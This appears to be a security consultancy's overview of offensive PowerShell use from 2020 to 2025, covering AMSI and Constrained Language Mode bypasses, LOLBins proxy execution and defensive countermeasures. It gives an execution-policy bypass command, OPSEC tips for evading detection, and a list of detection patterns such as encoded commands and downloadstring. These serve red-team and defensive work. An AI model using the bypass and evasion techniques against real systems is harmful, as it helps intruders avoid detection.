Offensive PowerShell Techniques (2020–2025) – Evasion, LOLBins, and Countermeasures

Executive Summary

PowerShell remains one of the most exploited native Windows tools in both red team and threat actor operations. From 2020–2025, its integration into the OS, deep administrative capabilities, and ability to operate “fileless” have driven widespread abuse. Key evolutions include advanced AMSI bypasses, Constrained Language Mode (CLM) evasions, and LOLBins-based proxy execution.
Notably, 35% of malicious detections in 2022 leveraged LOLBins, and PowerShell consistently ranked #2 in MITRE ATT&CK detections across enterprise telemetry. For red teams, it’s a high-reward vector; for blue teams, it’s a high-priority detection surface.

Overview

• Primary Function: Post-exploitation control, payload delivery, persistence, and data exfiltration.
• Core Strength: Native to Windows, signed by Microsoft, and deeply integrated with .NET.
• Platforms: Windows (desktop & server), with PowerShell Core also supporting Linux/macOS.
• Attack Surfaces:
  • Command-line execution
  • In-memory payload delivery
  • LOLBins proxy execution
  • Remote administration abuse

Setup & Deployment

Red Team Operator Loadout:

1. Environment Prep:
   • Ensure PowerShell v5+ for modern capabilities (unless intentionally downgrading for AMSI evasion).
   • Install modules: PowerSploit, Nishang, PSEmpire (if opsec allows).
2. Execution Policy Bypass:

   powershell.exe -nop -w hidden -ep bypass
   

3. Deploy Stealth:
   • Use System.Management.Automation namespace directly from .NET to avoid powershell.exe invocation.
   • Host payloads in memory with reflective loaders.
4. LOLBins Integration: Chain with rundll32, mshta, or installutil to execute PowerShell without the binary present in process listings.

Operational Use Cases

Red Team Applications:

• AMSI Bypass – Memory patching, reflection abuse, AMSI Write Raid (disclosed by OffSec in May 2024).
• CLM Bypass – System32 path spoofing, PowerShell downgrade to v2.
• Script Obfuscation – ASCII value conversion, compression + Base64, AST manipulation.
• LOLBins Proxying – certutil for file retrieval, mshta for script execution, rundll32 for stealth code execution.
• In-Memory Execution – VirtualAlloc + shellcode loaders, reflective DLL injection.

Blue Team Simulation:

• Weaponized to test detection coverage for:
  • AMSI bypass recognition
  • ScriptBlock smuggling
  • LOLBins chaining
  • Behavioral anomaly detection

OPSEC Considerations

• Process Visibility: Direct powershell.exe usage spikes alerts in mature SOC environments.
• Telemetry Footprint: Even with AMSI bypassed, Script Block Logging may expose payload content unless explicitly disabled.
• Parent-Child Process Chains: LOLBins execution reduces but doesn’t eliminate forensic traceability.
• Sandbox/EDR Behavior: New AI-based EDRs detect behavioral anomalies even without signature triggers.
• Payload Hosting: External staging over HTTP(S) risks threat intel flagging—use redirectors or internal C2 pivoting.

Defensive Countermeasures

Detection Priorities:

• Enable and forward Script Block Logging (Event ID 4104) and Module Logging (4103).
• Hunt for:
  • -EncodedCommand, -nop, -noni, .downloadstring
  • Excessive special character usage in command lines
  • Unexpected parent processes spawning PowerShell
• Monitor LOLBin usage patterns (mshta, rundll32, certutil, installutil) for abnormal arguments.
• Detect AMSI tampering via:
  • VirtualProtect API call monitoring
  • Registry changes to AMSI providers
  • Reflection usage against AMSI components

Mitigation Controls:

• Enforce AllSigned or RemoteSigned execution policy.
• Apply AppLocker or WDAC to limit PowerShell to trusted scripts.
• Use Just Enough Administration (JEA) for role-limited PowerShell capability.
• Deploy Constrained Language Mode for non-admin accounts.

Noorstream Perspective

PowerShell is a must-have vector in the offensive playbook. In the Noorstream stack:

• Red Team: Used for chained payload execution, behavioral evasion, and live lateral movement tests.
• Threat Intel: Monitored as a high-signal telemetry source for active breach indicators.
• Defensive Advisory: Hardening client environments against PowerShell abuse is a baseline service—LOLBins and AMSI bypass detection are part of our default Blue Team assessment package.
• Training: Noorstream’s red team operators maintain proficiency in emerging bypasses while our blue team replicates and tunes defenses against them.